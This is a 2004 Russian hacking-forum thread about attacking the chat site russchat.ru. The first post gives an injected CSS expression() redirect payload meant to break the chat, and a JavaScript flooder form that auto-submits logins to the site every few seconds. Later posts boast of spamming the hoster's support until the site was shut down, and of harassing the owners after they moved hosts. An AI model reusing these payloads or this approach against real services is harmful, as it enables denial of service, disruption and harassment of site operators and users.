Чаты Ломаем russchat.ru

Discussion in 'Веб-уязвимости' started by coder, 2 Feb 2004.

Thread Status:
Not open for further replies.
  1. coder

    coder New Member

    Joined:
    2 Feb 2004
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    В чат пихаем:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    <font style=background:expression(top.location=&amp;#x27;http:&amp;#x2f;&amp;#x2f;yandex.ru/&amp;#x27;)>привет![/QUOTE]<span id='postcolor'>

    и чат в дауне...

    Или флудим:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">< script>
    var i=0;
    var j="prodex";
    var c;
    function flood()
    {
    i++;
    if(i==1)
    {
        j=document.form1.login.value;
    }
    c=j+i;
    document.form1.login.value=c;
    document.forms[0].submit();
    window.setTimeout("flood();",3200);
    }
    </SCRIPT>
    <form name="form1" method="post" action="http://russchat.ru/down.php" >
    <table border="0"  cellspacing="0" cellpadding="0" height="50">
    <tr>
    <td width="59"><font size="2" face="Arial" color="black"><b>Ник:</b></font></td>
    <td width="126">
    <input class=name onFocus=id=className onBlur=id='' name=logn size=25 maxlength=32 style="width: 120px" >
    </td>
    <td>
    <input type="submit" value="войти" class="ok" style="width: 100px; cursor: hand;" onclick="flood()">
    <input type="hidden" name="room" value="main" ><input type="text" name="login" value=hack>
    </td>
    </tr>
    <tr>
    <td width="59"><font color="black" size="2" face="Arial"><b>Пароль:</b></font></td>
    <td width="126" >
    <input class=name onFocus=id=className onBlur=id='' name=pass size=25 maxlength=32 style="width: 120px" type="password">
    </td>
    <td>
     <font size="2" face="Arial" color="#00FFFF"><b> <a onClick="javascript: window.open('registr.php?room=shymkent','w1','top=0,left=0,titlebar=no,toolbar=no,width=780,height=530,directories=no,status=no,scrollbars=no,resize=no,menubar=no')"  class="downmenu" href="#">Регистрация</a>
    </b> НЕ обязательна, достаточно только ввести свой ник.</font>
      &amp;nbsp; <font size="2" face="Arial" color="#00FFFF"><b> <a onClick="javascript: window.open('help.php#pass?room=main','hlp','top=0,left=0,titlebar=no,toolbar=no,width=750,height=530,directories=no,status=no,scrollbars=yes,resizable=yes,menubar=no')"  class="downmenu" href="#">Вспомнить пароль...</a></b></font> </td>
    </tr>
    </table>
    </form>

    </body>
    </html>[/QUOTE]<span id='postcolor'>

    type=&quot;hidden&quot; name=&quot;room&quot; value=&quot;main&quot;
    Вместо main пишем логин чата который флудим!
     
  2. coder

    coder New Member

    Joined:
    2 Feb 2004
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    В общем я его полностью хакнул:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Работа сервера остановлена
    Обратитесь в службу поддержки.[/QUOTE]<span id='postcolor'>
     
  3. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (coder @ февраля 25 2004,09:10)</td></tr><tr><td id="QUOTE">В общем я его полностью хакнул:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Работа сервера остановлена
    Обратитесь в службу поддержки.[/QUOTE]<span id='postcolor'>[/QUOTE]<span id='postcolor'>
    Ой не смеши! Флудером ты его хакнул... [​IMG]
    Причины могли быть:
    1) Админ закрыл сайт на доработку (скорее всего)
    2) Была проведена dos-атака (что мало вероятно).
    1 тебе ее 100% не провести....
     
  4. coder

    coder New Member

    Joined:
    2 Feb 2004
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ февраля 25 2004,14:24)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (coder @ февраля 25 2004,09:10)</td></tr><tr><td id="QUOTE">В общем я его полностью хакнул:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Работа сервера остановлена
    Обратитесь в службу поддержки.[/QUOTE]<span id='postcolor'>[/QUOTE]<span id='postcolor'>
    Ой не смеши! Флудером ты его хакнул... [​IMG]
    Причины могли быть:
    1) Админ закрыл сайт на доработку (скорее всего)
    2) Была проведена dos-атака (что мало вероятно).
    1 тебе ее 100% не провести....[/QUOTE]<span id='postcolor'>
    Я не говорил, что я его флудом хакнул !!!!!!!!!!!!!!!!!!!!!!!

    Просто я нашел дыру в этой &quot;чатовской дыре&quot; с помощью которой можно было отправлять сообщения и я отправил 1000 писем на суппорт хостера на котором хостится это &quot;чатовская дыра&quot;.

    Короче суппорт отреагировал быстро, отключив этот сайт &nbsp;[​IMG]
     
  5. coder

    coder New Member

    Joined:
    2 Feb 2004
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    В общем я решил доканать этих балбесов:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Хостинг предоставлен компанией Majordomo.ru


    Ресурс временно недоступен.


    Если Вы владелец сайта, причину недоступности Вы можете узнать
    по телефону +7 (812) 32-007-32,
    или e-mail [email protected]
    [/QUOTE]<span id='postcolor'>
    Даже смена хостера им не помогла &nbsp;[​IMG]
     
Thread Status:
Not open for further replies.